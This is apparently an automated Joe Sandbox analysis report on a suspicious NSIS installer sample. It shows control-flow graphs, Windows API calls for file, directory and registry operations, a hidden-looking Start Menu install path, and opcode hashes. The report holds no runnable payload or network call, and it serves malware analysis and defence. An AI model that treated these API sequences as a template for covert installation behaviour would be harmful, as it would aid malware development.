                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FilePointer$CountTick
                                                                • String ID: uj)${0A
                                                                • API String ID: 1092082344-4025203094
                                                                • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 972 405b99-405be4 CreateDirectoryW 973 405be6-405be8 972->973 974 405bea-405bf7 GetLastError 972->974 975 405c11-405c13 973->975 974->975 976 405bf9-405c0d SetFileSecurityW 974->976 976->973 977 405c0f GetLastError 976->977 977->975
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                • GetLastError.KERNEL32 ref: 00405BF0
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                • GetLastError.KERNEL32 ref: 00405C0F
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 3449924974-823278215
                                                                • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 978 402ea9-402ed2 call 4064d5 980 402ed7-402edb 978->980 981 402ee1-402ee5 980->981 982 402f8c-402f90 980->982 983 402ee7-402f08 RegEnumValueW 981->983 984 402f0a-402f1d 981->984 983->984 985 402f71-402f7f RegCloseKey 983->985 986 402f46-402f4d RegEnumKeyW 984->986 985->982 987 402f1f-402f21 986->987 988 402f4f-402f61 RegCloseKey call 406a35 986->988 987->985 989 402f23-402f37 call 402ea9 987->989 994 402f81-402f87 988->994 995 402f63-402f6f RegDeleteKeyW 988->995 989->988 996 402f39-402f45 989->996 994->982 995->982 996->986
                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseEnum$DeleteValue
                                                                • String ID:
                                                                • API String ID: 1354259210-0
                                                                • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 997 6fc61817-6fc61856 call 6fc61bff 1001 6fc61976-6fc61978 997->1001 1002 6fc6185c-6fc61860 997->1002 1003 6fc61862-6fc61868 call 6fc6243e 1002->1003 1004 6fc61869-6fc61876 call 6fc62480 1002->1004 1003->1004 1009 6fc618a6-6fc618ad 1004->1009 1010 6fc61878-6fc6187d 1004->1010 1011 6fc618af-6fc618cb call 6fc62655 call 6fc61654 call 6fc61312 GlobalFree 1009->1011 1012 6fc618cd-6fc618d1 1009->1012 1013 6fc6187f-6fc61880 1010->1013 1014 6fc61898-6fc6189b 1010->1014 1037 6fc61925-6fc61929 1011->1037 1015 6fc618d3-6fc6191c call 6fc61666 call 6fc62655 1012->1015 1016 6fc6191e-6fc61924 call 6fc62655 1012->1016 1019 6fc61882-6fc61883 1013->1019 1020 6fc61888-6fc61889 call 6fc62b98 1013->1020 1014->1009 1017 6fc6189d-6fc6189e call 6fc62e23 1014->1017 1015->1037 1016->1037 1030 6fc618a3 1017->1030 1025 6fc61885-6fc61886 1019->1025 1026 6fc61890-6fc61896 call 6fc62810 1019->1026 1033 6fc6188e 1020->1033 1025->1009 1025->1020 1036 6fc618a5 1026->1036 1030->1036 1033->1030 1036->1009 1040 6fc61966-6fc6196d 1037->1040 1041 6fc6192b-6fc61939 call 6fc62618 1037->1041 1040->1001 1043 6fc6196f-6fc61970 GlobalFree 1040->1043 1047 6fc61951-6fc61958 1041->1047 1048 6fc6193b-6fc6193e 1041->1048 1043->1001 1047->1040 1049 6fc6195a-6fc61965 call 6fc615dd 1047->1049 1048->1047 1050 6fc61940-6fc61948 1048->1050 1049->1040 1050->1047 1052 6fc6194a-6fc6194b FreeLibrary 1050->1052 1052->1047
                                                                APIs
                                                                  • Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E74
                                                                  • Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E79
                                                                  • Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E7E
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC618C5
                                                                • FreeLibrary.KERNEL32(?), ref: 6FC6194B
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC61970
                                                                  • Part of subcall function 6FC6243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC6246F
                                                                  • Part of subcall function 6FC62810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FC61896,00000000), ref: 6FC628E0
                                                                  • Part of subcall function 6FC61666: wsprintfW.USER32 ref: 6FC61694
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                • String ID:
                                                                • API String ID: 3962662361-3916222277
                                                                • Opcode ID: ce1600d59b9842dd90c3ddf316dc21f2051b19b7d528d84538c82d74d3dd41e5
                                                                • Instruction ID: 514b5ec2d241660d5aea466980cbb7e6d1db541fc09a30cf84c90a9256db54b8
                                                                • Opcode Fuzzy Hash: ce1600d59b9842dd90c3ddf316dc21f2051b19b7d528d84538c82d74d3dd41e5
                                                                • Instruction Fuzzy Hash: 7B41A27180C3419BDF009F3DD8C8BD537A8BF0A76AF044466EA55AA0C6FB74E088C7A0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1054 40248a-4024bb call 402da6 * 2 call 402e36 1061 4024c1-4024cb 1054->1061 1062 402c2a-402c39 1054->1062 1063 4024cd-4024da call 402da6 lstrlenW 1061->1063 1064 4024de-4024e1 1061->1064 1063->1064 1068 4024e3-4024f4 call 402d84 1064->1068 1069 4024f5-4024f8 1064->1069 1068->1069 1072 402509-40251d RegSetValueExW 1069->1072 1073 4024fa-402504 call 403371 1069->1073 1076 402522-402603 RegCloseKey 1072->1076 1077 40251f 1072->1077 1073->1072 1076->1062 1077->1076
                                                                APIs
                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 00402515
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseValuelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp
                                                                • API String ID: 2655323295-4124611265
                                                                • Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                                • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                • Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                                • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1079 406536-406568 call 4064d5 1082 4065a6 1079->1082 1083 40656a-406598 RegQueryValueExW RegCloseKey 1079->1083 1085 4065aa-4065ac 1082->1085 1083->1082 1084 40659a-40659e 1083->1084 1084->1085 1086 4065a0-4065a4 1084->1086 1086->1082 1086->1085
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                • RegCloseKey.KERNELBASE(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422728), ref: 00406587
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: ('B$Call
                                                                • API String ID: 3356406503-2122505255
                                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004061A5
                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-44229769
                                                                • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID: uj)
                                                                • API String ID: 973152223-1893427432
                                                                • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                APIs
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                  • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,00000000,000000F0), ref: 0040164D
                                                                Strings
                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 00401640
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous
                                                                • API String ID: 1892508949-647064374
                                                                • Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                                • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                • Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                                • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040566D
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                  • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
